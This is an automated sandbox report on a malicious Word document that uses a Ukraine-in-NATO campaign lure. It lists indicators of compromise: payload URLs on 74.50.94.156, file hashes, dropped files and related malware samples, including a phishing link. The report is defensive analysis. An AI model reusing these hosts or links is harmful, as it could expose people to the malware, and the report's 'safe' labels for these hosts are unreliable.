https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | URL Reputation | safe
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe
https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe
https://officeci.azurewebsites.net/api/ | 0% | URL Reputation | safe
https://api.scheduler. | 0% | URL Reputation | safe
https://api.scheduler. | 0% | URL Reputation | safe
https://my.microsoftpersonalcontent.com | 0% | URL Reputation | safe
https://my.microsoftpersonalcontent.com | 0% | URL Reputation | safe
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
https://api.aadrm.com | 0% | URL Reputation | safe
https://api.aadrm.com | 0% | URL Reputation | safe
https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe
https://www.odwebp.svc.ms | 0% | URL Reputation | safe
https://api.addins.store.officeppe.com/addinstemplate | 0% | URL Reputation | safe
https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe
https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe
https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe
https://d.docs.live.net | 0% | URL Reputation | safe
https://ncus.contentsync. | 0% | URL Reputation | safe
https://apis.live.net/v5.0/ | 0% | URL Reputation | safe
https://wus2.contentsync. | 0% | URL Reputation | safe
https://make.powerautomate.com | 0% | URL Reputation | safe
https://asgsmsproxyapi.azurewebsites.net/ | 0% | URL Reputation | safe
http://74.50.94.156/MSHTML_C7/zip_k.asp?d=84.17.52.5_4f657_ | 0% | Avira URL Cloud | safe
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h | 0% | Avira URL Cloud | safe
http://74.50.94.156/MSHTML_C7/zip_k2.asp?d=84.17.52.5_4f657_ | 0% | Avira URL Cloud | safe
https://login.windows.local | 0% | URL Reputation | safe
http://74.50.94.156/MSHTML_C7/start.xmlyX | 0% | Avira URL Cloud | safe
http://74.50.94.156/MSHTML_C7/start.xml | 0% | Avira URL Cloud | safe
http://74.50.94.156/MSHTML_C7/RFile.asp | 0% | Avira URL Cloud | safe
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://74.50.94.156/MSHTML_C7/zip_k2.asp?d=84.17.52.5_4f657_ | false | Avira URL Cloud: safe | unknown
http://74.50.94.156/MSHTML_C7/zip_k.asp?d=84.17.52.5_4f657_ | false | Avira URL Cloud: safe | unknown
http://74.50.94.156/MSHTML_C7/start.xml | false | Avira URL Cloud: safe | unknown
http://74.50.94.156/MSHTML_C7/RFile.asp | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.diagnosticssdf.office.com | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://login.microsoftonline.com/ | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://shell.suite.office.com:1443 | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://autodiscover-s.outlook.com/ | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://cdn.entity. | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | URL Reputation: safe | unknown
https://api.addins.omex.office.net/appinfo/query | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://clients.config.office.net/user/v1.0/tenantassociationkey | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://powerlift.acompli.net | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | URL Reputation: safe | unknown
https://rpsticket.partnerservices.getmicrosoftkey.com | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | URL Reputation: safe | unknown
https://lookup.onenote.com/lookup/geolocation/v1 | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://cortana.ai | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | URL Reputation: safe; URL Reputation: safe | unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://cloudfiles.onenote.com/upload.aspx | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://entitlement.diagnosticssdf.office.com | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://api.aadrm.com/ | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | URL Reputation: safe; URL Reputation: safe | unknown
https://ofcrecsvcapi-int.azurewebsites.net/ | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | URL Reputation: safe | unknown
http://74.50.94.156/MSHTML_C7/start.xmlyX | ~WRF{23F61671-1248-4D9F-BE58-51806C7F80DF}.tmp.0.dr | false | Avira URL Cloud: safe | unknown
https://www.yammer.com | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://api.microsoftstream.com/api/ | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://cr.office.com | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | Avira URL Cloud: safe | low
https://portal.office.com/account/?ref=ClientMeControl | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://graph.ppe.windows.net | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://res.getmicrosoftkey.com/api/redemptionevents | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | URL Reputation: safe | unknown
https://powerlift-frontdesk.acompli.net | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | URL Reputation: safe; URL Reputation: safe | unknown
https://tasks.office.com | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://officeci.azurewebsites.net/api/ | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | URL Reputation: safe | unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://api.scheduler. | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | URL Reputation: safe; URL Reputation: safe | unknown
https://my.microsoftpersonalcontent.com | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | URL Reputation: safe; URL Reputation: safe | unknown
https://store.office.cn/addinstemplate | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | URL Reputation: safe; URL Reputation: safe | unknown
https://api.aadrm.com | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | URL Reputation: safe; URL Reputation: safe | unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid= | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://globaldisco.crm.dynamics.com | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://messaging.engagement.office.com/ | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://dev0-api.acompli.net/autodetect | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | URL Reputation: safe | unknown
https://www.odwebp.svc.ms | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | URL Reputation: safe | unknown
https://api.diagnosticssdf.office.com/v2/feedback | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://api.powerbi.com/v1.0/myorg/groups | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://web.microsoftstream.com/video/ | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://api.addins.store.officeppe.com/addinstemplate | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | URL Reputation: safe | unknown
https://graph.windows.net | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://dataservice.o365filtering.com/ | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | URL Reputation: safe | unknown
https://officesetup.getmicrosoftkey.com | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | URL Reputation: safe | unknown
https://analysis.windows.net/powerbi/api | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://prod-global-autodetect.acompli.net/autodetect | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | URL Reputation: safe | unknown
https://substrate.office.com | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://outlook.office365.com/autodiscover/autodiscover.json | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://consent.config.office.com/consentcheckin/v1.0/consents | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://d.docs.live.net | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | URL Reputation: safe | unknown
https://ncus.contentsync. | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | URL Reputation: safe | unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
http://weather.service.msn.com/data.aspx | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://apis.live.net/v5.0/ | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | URL Reputation: safe | unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | | high
https://messaging.lifecycle.office.com/ | 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | false | |
                                                                                              high
                                                                                              https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                high
                                                                                                https://pushchannel.1drv.ms3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                  high
                                                                                                  https://management.azure.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                    high
                                                                                                    https://outlook.office365.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                      high
                                                                                                      https://wus2.contentsync.3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://incidents.diagnostics.office.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                        high
                                                                                                        https://clients.config.office.net/user/v1.0/ios3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                          high
                                                                                                          https://make.powerautomate.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://insertmedia.bing.office.net/odc/insertmedia3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                            high
                                                                                                            https://o365auditrealtimeingestion.manage.office.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                              high
                                                                                                              https://outlook.office365.com/api/v1.0/me/Activities3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                high
                                                                                                                https://api.office.net3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                  high
                                                                                                                  https://incidents.diagnosticssdf.office.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                    high
                                                                                                                    https://asgsmsproxyapi.azurewebsites.net/3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://clients.config.office.net/user/v1.0/android/policies3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                      high
                                                                                                                      https://entitlement.diagnostics.office.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                        high
                                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                          high
                                                                                                                          https://substrate.office.com/search/api/v2/init3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                            high
                                                                                                                            https://outlook.office.com/3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                              high
                                                                                                                              https://storage.live.com/clientlogs/uploadlocation3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                                high
                                                                                                                                https://login.windows.local3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://outlook.office365.com/3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://webshell.suite.office.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://login.microsoftonline.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://substrate.office.com/search/api/v1/SearchHistory3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                                          high
IP | Domain | Country | ASN | ASN Name | Malicious
74.50.94.156 | unknown | United States | 19318 | IS-AS-1US | false

IP
192.168.2.1
Joe Sandbox Version: 38.0.0 Beryl
Analysis ID: 1266120
Start date and time: 2023-07-03 19:16:25 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 54s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of analysed new started processes analysed: 3
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: Overview_of_UWCs_UkraineInNATO_campaign.docx.doc
Detection: MAL
Classification: mal72.spyw.evad.winDOC@3/41@0/2
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): WMIADAP.exe
• Excluded IPs from analysis (whitelisted): 52.109.32.24, 20.231.69.218, 20.223.130.133, 20.224.201.79
• Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, nexus.officeapps.live.com, officeclient.microsoft.com, europe.configsvc1.live.com.akadns.net
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
Time | Type | Description
19:17:36 | API Interceptor | 1x Sleep call for process: splwow64.exe modified
No context
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
IS-AS-1US | CdNslw8Sk8.exe | malicious | RMSRemoteAdmin | 64.20.61.146
IS-AS-1US | CdNslw8Sk8.exe | malicious | RMSRemoteAdmin | 64.20.61.146
IS-AS-1US | lzMMApbdRw.exe | malicious | RMSRemoteAdmin | 64.20.61.146
IS-AS-1US | lzMMApbdRw.exe | malicious | RMSRemoteAdmin | 64.20.61.146
IS-AS-1US | c8GgBkDb3N.exe | malicious | RMSRemoteAdmin, RedLine | 64.20.61.146
IS-AS-1US | https://e.targito.com/c?a=a765e20b-92d0-4544-a4c3-c23518cbf01d&o=gsklub_cz&m=6b67e0df-8f21-4d26-bac6-98abbf8b9329&c=75283f30-ec7c-4c64-8e96-b11b9ceb9007&d=1550125868&l=footer_menu_2&u=http://jtq.hummingbird-hemp.sa.com/jumeirah/YWJyYWhhbS5jaGFja29AanVtZWlyYWguY29t | malicious | HTMLPhisher | 173.214.160.47
IS-AS-1US | AnyDesk_SetupV3.12.exe | malicious | RMSRemoteAdmin | 64.20.61.146
IS-AS-1US | AnyDesk_SetupV3.12.exe | malicious | RMSRemoteAdmin | 64.20.61.146
IS-AS-1US | iI6NKK6i4l.elf | malicious | Mirai | 74.50.88.246
IS-AS-1US | 40SCua6qXH.elf | malicious | Mirai | 74.50.88.246
IS-AS-1US | 8YxhSD1jYK.elf | malicious | Mirai | 74.50.88.246
IS-AS-1US | Wt6Ggw62Gk.elf | malicious | Mirai | 74.50.88.246
IS-AS-1US | WmX5iiA1zx.elf | malicious | Mirai | 74.50.88.246
IS-AS-1US | Dm9169jB1I.elf | malicious | Mirai | 74.50.88.246
IS-AS-1US | 4c3NLEtpjf.elf | malicious | Mirai | 74.50.88.246
IS-AS-1US | xnDXPtRLCO.elf | malicious | Mirai | 74.50.88.246
IS-AS-1US | 8WCdSJMG6y.elf | malicious | Mirai | 74.50.88.246
IS-AS-1US | 4q6H5y3eet.elf | malicious | Mirai | 74.50.88.246
IS-AS-1US | GTg4MYBHb5.elf | malicious | Mirai | 74.50.88.246
No context
No context
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 157328
Entropy (8bit): 5.349049214497573
Encrypted: false
SSDEEP: 1536:P+C/FPgfHB7U9guw19Q9DQA+zQvk4F77nXmvidlXRjE6LRj6h:KDQ9DQA+zQXWh
MD5: 2C04D4384A25BBFAFB02FAB4FFDA731E
SHA1: CFAB4FF1347CDD942115A84CFB8E9FE3022543C6
SHA-256: 372E1269A5D86F5D1D8E19709293063E692E2D038FC93BC5A07D3F0B5F4DE62C
SHA-512: A8E3B6D141F61A8E6AB3927EE91EDC09DEED7EB5D77B27EA077B57CDB73144A1DD39748B2959392C21990F37C1698C9EA140F7D7AAC2507A8F7CE87CDDF692A9
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2023-07-03T17:17:22">.. Build: 16.0.16626.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.ResourceId]" o:authorityUrl="[ADALAuthorityU
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: PNG image data, 219 x 219, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 96252
Entropy (8bit): 7.9932951858885435
Encrypted: true
SSDEEP: 1536:oULeKytQVl7xR8oLcrDGKaCeOSd8H2vRCcwziwX4Ym0sIe7wHvUExq2hCIXy1:oULFyt0l7P8trDG5CL1WvRC5pugMExF0
MD5: BC1CCF91CC3D7F39497E5287B10EB78B
SHA1: 0E84A621E84212D161418B6D6629AB91B2A41FCD
SHA-256: 88E4EC9AF07F3B56D4131D0A2D2EECC63F971CA41E185904036BA0B41B40BBB6
SHA-512: E542531996D95FF6337CE2B59D39024AD74E1228C5C2F039F23B0BCFAC94BE55FECB99B575112885A57E4BE29CC13E4459B7CDBAFB58D9FAB2E3D19102BF3C08
Malicious: false
Reputation: low
                                                                                                                                          Preview:.PNG........IHDR...............@....IDATx^......><.4.4.M.....M.].nl@b..h.Q`...0PRD@z.......Z..G=z<.9..........O.k.k..=.=~.hG.Z.....Z8[u..q.#g.g+.nm........J..TS^k...|..Zt.u.v~Nf..m.L[.u>oA.7.&?...w\...o....v.9...j.e...t..j_n.c../....<GG.n...:....8.~.............%.H.._...s.uh.....).-|l.v%.".m:p5...%..6...]...C+.i{%...Q}?..D?............x....bt.D,..D.5..h..L....Zi8lS .w@j...8w."j.\@Ay=..V....hO...8../...M_..X...+3v`i.v..|/2v.D.W....2|}....*P^w../^....."...N..=.tJE.S..(...d....:....:....14..I...i.]^k... 4...5......v.....2d~v.q....Mx.'.....c0....<#..<.a...#go.8.p.A...z...e.|t.^..|...F..0..k8z..c.W0n.#.V..`...s..<....%..2}'.......4......04."@j..c..y<r..2j.hU..{...o...!.G?.....] &........[q......#t.Wxr.Z.<..C...9.c`...6..2........w...K,.\.`.....p.(..n1...n.`...<"`...v.0.7...}`.....x.%r.q.w.Bw.`t.'(m..)...P...c..?&=...^_.7...d3Ax....^Rj.......*>.(..h.^.=...7.~...o}?.\..o..`Y.v<....O%....;A.B.m.....RE..#.F.=8..FpF..G.[.z.......$..{....sO>.yO.8..
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Eduardo, Template: Normal.dotm, Last Saved By: Eduardo, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Apr 13 14:11:00 2022, Last Saved Time/Date: Wed Apr 13 14:11:00 2022, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):23870
                                                                                                                                          Entropy (8bit):3.126890272974214
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:zWjUlLZEvA+6/6rNavrgYjk+4bWl92zBi1RH1rGOJU:zWjo8iSwvxjk+t9+i1RH1rG3
                                                                                                                                          MD5:26A6A0C852677A193994E4A3CCC8C2EB
                                                                                                                                          SHA1:70560AFF35F1904F822E49D3316303877819EEF8
                                                                                                                                          SHA-256:07377209FE68A98E9BCA310D9749DAA4EB79558E9FC419CF0B02A9E37679038D
                                                                                                                                          SHA-512:BF35991FEC81B96EAE2CE5C90AE627DD6CF11C61C5369DC34BBBC65E24C3E1F413F475BDB8321F455E5F4B6EAA833B3D33F847C744C68AE6E853A373AD2B37AE
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:......................>.........<html>........'...........)...............&......................................................................................................................................................................................................................................................................................................................................................................................................................................................=.............................bjbj..............................L..hL..h..................................................................................F.......F...............................................................................................................t...................................................................M.......O.......O.......O.......O.......O.......O...$...B...........F...s.....................................................................
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):26
                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:gAWYp:qYp
                                                                                                                                          MD5:ACC88D3264FC06AE3584A8ED90009260
                                                                                                                                          SHA1:FD63700F852BE379C417253CA869CC1C5E2F46A0
                                                                                                                                          SHA-256:E9066838A2265B9327318C602ED6954BC1A26869C19FAA255CD26A3C7CE707A7
                                                                                                                                          SHA-512:CB41EF87941B26F1CB25DB61536A6C89F3B7A3BC67B4CFBE7290DD528DACC6870A08CDC2AABAF289382A5CD7EF96C95556B05B8EAD3FB1317DFCD18B6302E456
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:[ZoneTransfer]..ZoneId=1..
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):32768
                                                                                                                                          Entropy (8bit):1.728408315871704
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:DS7Q6BS7Q1ODSODlK2K+S7Q1ODpKQS7Q1ODpK:WMfM1MVM
                                                                                                                                          MD5:C9A8F0CF3BA00E68CF681064112C61F5
                                                                                                                                          SHA1:E0F67CD2774836076F5C9269D9BFB13C92117C53
                                                                                                                                          SHA-256:6914A54ACEE03E5B7A3790DA32EF689C35F9FDB0CA133AC95C53A85A1E880531
                                                                                                                                          SHA-512:DFE074AF6E4D3729A404A5B1E7025CE0C35D7CC55F3F36E12E1F697660228B57A43BB38726CB33705DBC30EE68204BC51F8524426B72F7D14E70F050F35C4A5F
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):8192
                                                                                                                                          Entropy (8bit):3.2278335278897203
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:dixTL8H5svkLvwbVFnYk12kj98zlz/InyVS/VF2we1ki92VnX6FQNmyxUWou/aCU:4MH9vwpq0bx8d/stiyDnLDxnlpU
                                                                                                                                          MD5:4FE05F0820EED1BD3D5229774B9F5ED3
                                                                                                                                          SHA1:5E33F699D9D2BF7F1C1BCD893DEA3031333DC37C
                                                                                                                                          SHA-256:A18D1B7695C360B572F6A229C995873C12302F1DDDE9D199313CDCC0EA733C43
                                                                                                                                          SHA-512:97005EB8F3B0F9128F1906BC0AC0FE11923FF62541BBA756F100E63BD3BFB9954EEFB6E3F4806DE4BC3F68330A4487341FBDA8DCB635E6C308FDB88BAB0CCEB9
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:../.................T.a.l.k.i.n.g. .p.o.i.n.t.s. .f.o.r. .U.W.C.. s. .#.U.k.r.a.i.n.e.I.n.N.A.T.O. .c.a.m.p.a.i.g.n.....T.o.d.a.y.,. .U.k.r.a.i.n.e. .i.s. .f.i.g.h.t.i.n.g. .f.o.r. .m.o.r.e. .t.h.a.n. .i.t.s. .o.w.n. .f.r.e.e.d.o.m.,. .i.n.d.e.p.e.n.d.e.n.c.e. .a.n.d. .s.o.v.e.r.e.i.g.n.t.y.;. .U.k.r.a.i.n.e. .i.s. .f.i.g.h.t.i.n.g. .f.o.r. .t.h.e. .f.r.e.e.d.o.m. .o.f. .E.u.r.o.p.e. .a.n.d. .f.o.r. .t.h.a.t. .o.f. .t.h.e. .e.n.t.i.r.e. .F.r.e.e. .W.o.r.l.d.,. .f.o.r. .t.h.e. .v.e.r.y. .v.a.l.u.e.s. ...............................................v...x...........Z.......8...:.......B....... ..."................................................................................................................................................................................................................................................................................................................................................................................................d........&..F..
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:data
